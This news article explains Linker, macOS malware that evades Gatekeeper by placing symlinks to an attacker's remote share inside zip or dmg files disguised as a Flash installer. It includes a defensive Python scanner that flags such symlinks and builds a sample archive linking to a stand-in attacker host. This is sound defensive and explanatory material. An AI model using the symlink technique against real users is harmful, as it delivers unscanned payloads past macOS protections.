Discovered by Intego, Linker is the first malware known to exploit a vulnerability in macOS Gatekeeper that had already been disclosed. The flaw lets an attacker place, inside a legitimate-looking application, a symbolic link to a remote application hosted on an attacker-controlled machine; because the link target lives outside the downloaded package, it is never scanned by Gatekeeper or XProtect. A video demonstrating the attack is available.

An attacker can place the symbolic link in either a zip file or a .dmg file (Apple Disk Image format). Intego points out that one of the samples was signed with the same Apple Developer ID (“Mastura Fenny”) as the OSX/Surfbuyer adware.
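A defender-side check for the technique described above, added here as an example (not code from Intego, Check Point, or the malware itself): it walks a zip archive's entries, picks out symlink members, and flags any whose target resolves outside the archive, whether an absolute path, a parent-directory escape, or an automount prefix such as /net/ that resolves to a network share. The prefix list is an assumed heuristic, and the sample archive, bundle names and attacker hostname are constructed.

```python
import io
import posixpath
import stat
import zipfile

# Automount / mounted-share roots (assumed heuristic list): a symlink into one of
# these resolves to content that lives outside the downloaded archive.
SUSPICIOUS_PREFIXES = ("/net/", "/Volumes/", "/Network/")

def classify_symlink(member, target):
    """Return a reason string if the link leaves the archive, else None."""
    if target.startswith(SUSPICIOUS_PREFIXES):
        return "points into automount/share path"
    if posixpath.isabs(target):
        return "absolute target outside archive"
    # Resolve the relative target against the member's directory inside the zip.
    resolved = posixpath.normpath(posixpath.join(posixpath.dirname(member), target))
    if resolved == ".." or resolved.startswith("../"):
        return "escapes archive root via .."
    return None

def find_escaping_symlinks(zip_bytes):
    """Return [(member, target, reason)] for every symlink that leaves the archive."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for zi in zf.infolist():
            mode = zi.external_attr >> 16  # Unix mode bits kept in the central directory
            if not stat.S_ISLNK(mode):
                continue
            target = zf.read(zi).decode("utf-8", "replace")  # link target is the entry body
            reason = classify_symlink(zi.filename, target)
            if reason:
                findings.append((zi.filename, target, reason))
    return findings

def _add_symlink(zf, name, target):
    zi = zipfile.ZipInfo(name)
    zi.create_system = 3  # Unix, so the mode bits in external_attr are meaningful
    zi.external_attr = (stat.S_IFLNK | 0o755) << 16
    zf.writestr(zi, target)

def build_sample_zip():
    """Constructed sample: one harmless relative symlink and one link to a remote share."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Installer.app/Contents/MacOS/Installer", b"#!/bin/sh\necho ok\n")
        _add_symlink(zf, "Installer.app/Contents/Resources/Current", "../MacOS")
        # "attacker.example" is a constructed host; the real share path is not on the page.
        _add_symlink(zf, "Installer.app/Contents/MacOS/Run", "/net/attacker.example/share/payload.app")
    return buf.getvalue()
```

Running `find_escaping_symlinks(build_sample_zip())` reports only the `/net/` link; the relative `../MacOS` link stays inside the bundle and is not flagged.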

On installation the malware presents itself as an Adobe Flash Player installer, a common disguise for macOS malware.

Source: CheckPoint

Although the remote application had already been removed, a researcher named Adam Thomas found a PCAP on VirusTotal containing the remote application that was downloaded when the original application was installed. At that time it was only a bash script that created a temporary file, but since it is hosted on a remote machine it could be swapped at any moment: the attacker can test with a harmless script and later put a malicious application in its place.

Source: Intego